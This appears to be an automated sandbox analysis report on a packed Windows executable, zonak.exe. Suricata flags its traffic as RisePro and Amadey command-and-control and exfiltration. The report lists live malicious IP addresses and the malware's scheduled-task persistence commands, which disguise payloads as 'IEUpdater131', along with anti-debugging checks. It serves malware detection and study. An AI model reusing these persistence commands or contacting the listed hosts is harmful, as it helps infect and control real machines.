Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 20, 2024, 6:09 p.m.	Jan. 20, 2024, 6:15 p.m.

Size	1.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`d1d8db81157f989532108d62c64cbc33`
SHA256	`00c22e9ca48003f984bd237e0f2fe225e9d34413c3886a8fac0890274b9fca66`
CRC32	`E5028FE1`
ssdeep	`24576:Gq3IEVgF+4QnpJVDA64d/lHqZU5wQg6icoEC+KrAWA/QymLgPI:Gq5JnpJtA64d/xqZU5lHoEQA/NmLgP`
Yara	IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

zonak.exe "C:\Users\test22\AppData\Local\Temp\zonak.exe"
1884
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2424
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2532
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 HR" /sc HOURLY /rl HIGHEST
  2688
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 LG" /sc ONLOGON /rl HIGHEST
  2748
- IEUpdater131.exe "C:\ProgramData\IEUpdater131\IEUpdater131.exe"
  2808
- nMwYVOGnAUUKXSussjvl.exe "C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\nMwYVOGnAUUKXSussjvl.exe"
  2884
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    2936
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2936 CREDAT:145409
      3068
- BjNbQTa_ebXggk2TL4BU.exe "C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\BjNbQTa_ebXggk2TL4BU.exe"
  2508
  - explorhe.exe "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe"
    2684
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
      2520
    - livak.exe "C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe"
      2644
      - IEUpdater131.exe "C:\ProgramData\IEUpdater131\IEUpdater131.exe"
        2660
    - zonak.exe "C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe"
      2840
      - IEUpdater131.exe "C:\ProgramData\IEUpdater131\IEUpdater131.exe"
        2692
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      1552
- G2ldKV13OLUoACudPq3i.exe "C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\G2ldKV13OLUoACudPq3i.exe"
  2792
- XhlUBuzr_erltjsCc2i8.exe "C:\Users\test22\AppData\Local\Temp\jobA4aMVU2q3PEZqhY\XhlUBuzr_erltjsCc2i8.exe"
  160
  - IEUpdater131.exe "C:\ProgramData\IEUpdater131\IEUpdater131.exe"
    2264
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
accounts.google.com	A 108.177.125.84	64.233.188.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 172.217.25.4	142.250.76.132
ssl.gstatic.com	A 142.250.207.67	142.250.76.131
lizotel.pt	A 185.240.248.84	185.240.248.84
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	172.67.75.166
www.maxmind.com	A 104.18.145.235 A 104.18.146.235	104.18.145.235

IP Address	Status	Action
104.18.146.235	Active	Moloch
104.26.4.15	Active	Moloch
108.177.125.84	Active	Moloch
109.107.182.3	Active	Moloch
117.18.232.200	Active	Moloch
142.250.207.67	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.4	Active	Moloch
185.215.113.68	Active	Moloch
185.240.248.84	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49189 -> 108.177.125.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49185	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	Malware Command and Control Activity Detected
TCP 185.215.113.68:80 -> 192.168.56.103:49183	2400020	ET DROP Spamhaus DROP Listed Traffic Inbound group 21	Misc Attack
TCP 192.168.56.103:49183 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 142.250.207.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49183	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49201 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 108.177.125.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49183	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49183	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 142.250.207.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49223	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49224	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49226 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49226 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49226 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49223	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 185.240.248.84:443 -> 192.168.56.103:49211	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49230 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49230 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49230 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49224	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 185.240.248.84:443 -> 192.168.56.103:49217	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.103:49222	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49223 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.240.248.84:443 -> 192.168.56.103:49251	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 185.240.248.84:443 -> 192.168.56.103:49269	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49249 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49224 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49253 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49268 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49250 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49257 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2014819	ET INFO Packed Executable Download	Misc activity
TCP 109.107.182.3:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49234 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49236 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 185.240.248.84:443 -> 192.168.56.103:49247	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 185.240.248.84:443 -> 192.168.56.103:49262	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49267 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49203	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49203	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49203	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 185.215.113.68:80 -> 192.168.56.103:49203	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49209 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49216 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49228 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49233 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.240.248.84:443 -> 192.168.56.103:49238	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.103:49242	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 185.240.248.84:443 -> 192.168.56.103:49255	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 185.215.113.68:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49261 -> 185.240.248.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49234 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49189 108.177.125.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49168 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49194 142.250.207.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49201 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49190 108.177.125.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49200 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49193 142.250.207.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49232 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49236 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49228 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameA Jan. 20, 2024, 6:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 20, 2024, 6:11 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 20, 2024, 6:10 p.m.			0	0
IsDebuggerPresent Jan. 20, 2024, 6:10 p.m.			0	0
IsDebuggerPresent Jan. 20, 2024, 6:10 p.m.			0	0
IsDebuggerPresent Jan. 20, 2024, 6:11 p.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 20, 2024, 6:10 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 20, 2024, 6:10 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 20, 2024, 6:10 p.m.	buffer: SUCCESS: The scheduled task "IEUpdater131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 20, 2024, 6:10 p.m.	buffer: SUCCESS: The scheduled task "IEUpdater131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 20, 2024, 6:10 p.m.	buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 20, 2024, 6:10 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

One or more processes crashed (50 out of 226 events)

Time & API	Arguments	Status
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cf21b @ 0xe3f21b zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930260 registers.edi: 14905484 registers.eax: 0 registers.ebp: 3930288 registers.edx: 0 registers.ebx: 41431868 registers.esi: 5 registers.ecx: 41431868	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cf21b @ 0xe3f21b zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930260 registers.edi: 3930260 registers.eax: 0 registers.ebp: 3930288 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930468	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbb50 @ 0xe3bb50 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 14905484 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 9375744 registers.esi: 13570048 registers.ecx: 13570048	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbb50 @ 0xe3bb50 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbb50 @ 0xe3bb50 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbb50 @ 0xe3bb50 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbb50 @ 0xe3bb50 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 14905484 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 9375744 registers.esi: 13570048 registers.ecx: 0	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
